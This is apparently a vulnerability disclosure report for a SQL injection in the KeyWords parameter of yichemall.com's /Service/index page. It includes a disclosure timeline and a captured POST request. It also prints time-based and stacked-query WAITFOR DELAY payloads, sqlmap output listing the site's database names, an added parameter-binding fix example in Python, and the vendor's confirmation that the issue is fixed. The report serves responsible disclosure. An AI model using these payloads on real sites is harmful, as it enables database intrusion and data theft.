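2015-03-30: Details reported to the vendor; awaiting vendor handling
2015-03-30: Vendor confirmed; details disclosed to the vendor only
2015-04-09: Details disclosed to core white hats and experts in related fields
2015-04-19: Details disclosed to regular white hats
2015-04-29: Details disclosed to trainee white hats
2015-05-14: Details disclosed to the public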
Yiche Mall has a SQL injection, caused by an incomplete earlier fix.
Affected location: http://www.yichemall.com/Service/index
KeyWords=
The KeyWords parameter is injectable (login required).
POST /Service/index HTTP/1.1
Host: www.yichemall.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: xxxx, xxxxxxx
Referer: http://www.yichemall.com/Service/index
Cookie: **********************************redacted******************************************************************************************************************
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

KeyWords=%E2%80%98
Place: POST
Parameter: KeyWords
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: KeyWords=%E2%80%98'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: KeyWords=%E2%80%98' WAITFOR DELAY '0:0:5'--
---
[07:56:23] [INFO] testing Microsoft SQL Server
[07:56:23] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[07:56:28] [INFO] confirming Microsoft SQL Server
[07:56:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, Nginx
back-end DBMS: Microsoft SQL Server 2008
[07:56:44] [INFO] fetching database names
[07:56:44] [INFO] fetching number of databases
[07:56:44] [INFO] retrieved: 3
[07:57:01] [INFO] retrieved: master
[07:59:05] [INFO] retrieved:
[07:59:33] [ERROR] invalid character detected. retrying..
[07:59:33] [WARNING] increasing time delay to 6 seconds
tempdb
[08:02:18] [INFO] retrieved: yichemallorder
available databases [3]:
[*] master
[*] tempdb
[*] yichemallorder
Strengthen filtering.
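An added example (not part of the original report and not the vendor's code) that swaps filtering for parameter binding: the report's own KeyWords values are run against a concatenated query and a bound one. SQLite stands in for SQL Server so the block runs offline, and the table, column and function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE service_article (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO service_article (title) VALUES (?)",
                   [("How to pay a deposit",), ("Refund policy",),
                    ("Quote \u2018marks\u2019 in titles",)])
    return db

def search_concat(db, keywords):
    """'Before' form: KeyWords is spliced into the statement text."""
    sql = "SELECT title FROM service_article WHERE title LIKE '%" + keywords + "%'"
    return [row[0] for row in db.execute(sql)]

def search_bound(db, keywords):
    """Hardened form: KeyWords travels as a bound parameter, never as SQL text."""
    # Escape LIKE wildcards so the input cannot widen the match either.
    escaped = keywords.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT title FROM service_article WHERE title LIKE ? ESCAPE '\\'"
    return [row[0] for row in db.execute(sql, ("%" + escaped + "%",))]

def classify(search, db, keywords):
    """('rows', n) if the input stayed data; ('broken', error) if it changed the statement."""
    try:
        return ("rows", len(search(db, keywords)))
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return ("broken", type(exc).__name__)

# Values taken from the report: the probe in the request body and the two
# payloads printed in the sqlmap output.
PROBE = "\u2018"
STACKED = "\u2018'; WAITFOR DELAY '0:0:5'--"
TIME_BLIND = "\u2018' WAITFOR DELAY '0:0:5'--"

if __name__ == "__main__":
    db = make_db()
    for name, value in (("probe", PROBE), ("stacked", STACKED), ("time-blind", TIME_BLIND)):
        print(name, "concat:", classify(search_concat, db, value),
              "bound:", classify(search_bound, db, value))
```

With concatenation, both payloads stop being a search term and become statement text, which SQLite rejects and SQL Server executes; with binding they are searched for literally and match nothing.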
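Severity: High
Vulnerability Rank: 15
Confirmed: 2015-03-30 09:25
Thank you very much for your help to Yiche; we will handle this as soon as possible.
2015-03-30: Already fixed. Thank you very much for your support of Yiche.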